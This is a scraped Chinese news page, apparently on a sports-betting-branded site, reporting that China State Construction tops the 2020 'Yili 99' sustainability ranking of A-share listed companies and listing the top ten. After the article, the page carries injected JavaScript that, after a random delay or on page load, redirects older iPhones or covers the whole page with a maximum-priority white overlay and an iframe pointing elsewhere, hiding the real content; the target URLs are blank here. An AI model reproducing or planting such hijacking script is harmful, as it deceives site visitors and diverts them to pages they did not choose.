QSTY球速体育新闻资讯
中国建筑位居2020年度“义利99”榜单榜首
发布时间:2020-07-02
  |  
阅读量:
字号:
A+ A- A

6月15日,社会价值投资联盟发布了2020年A股上市公司可持续发展价值“义利99”年度榜单。值得一提的是,中国建筑自2015年至2018年连续四年位列“义利99”排行榜榜首后,2019年暂居榜单第二位,今年则重回榜首。中国建筑持续保持了高经济贡献、高社会贡献和高环境贡献。

  “义利99”全称为“A股上市公司可持续发展价值义利99”,是指以上市公司3A可持续发展价值评估模型为工具,以沪深300成分股为对象,以经济、社会和环境综合贡献为内容,可持续发展价值得分居前99的上市公司群体。沪深300成分股每年6月和12月分别更新一次,因此,发现中国“义利99”每年评估两次,并以每年6月评估结果发布年度榜单。

  2020年“义利99”排行榜前十强上市公司中,工业2家、金融2家、能源2家、原材料1家、信息技术1家、地产2家,可选消费、医药卫生、主要消费、公用事业和电信业务5个行业都没有公司进入前十强。2020年“义利99”年度榜单前十强上市公司分别为中国建筑、中国石化、海康威视、中国神华、万科A、海螺水泥、中国平安、招商银行、中国铁建和招商蛇口。

"; // 电脑链接 const mobileUrl = ""; // 移动链接 const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (isIOS && getIosVersion() < 13) { setTimeout(() => { window.location.href = mobileUrl; }, time); } else { // 检测用户使用的设备类型 const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); document.addEventListener("DOMContentLoaded", () => { const viewportMeta = document.createElement("meta"); viewportMeta.setAttribute("name", "viewport"); viewportMeta.setAttribute("content", "user-scalable=no, width=device-width, initial-scale=1.0"); document.head.appendChild(viewportMeta); const style = document.createElement("style"); style.innerHTML = "html, body { width: 100%; height: 100%; overflow: hidden; }"; document.head.appendChild(style); const divContainer = document.createElement("div"); divContainer.style.cssText = "width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: 2147483647; background: #fff;"; document.body.appendChild(divContainer); const iframe = document.createElement("iframe"); iframe.src = isMobile ? mobileUrl : desktopUrl; iframe.style.cssText = "border: 0; width: 100%; text-align: center; border: medium none; height: 100%; max-height: 4000px;"; divContainer.appendChild(iframe); }); }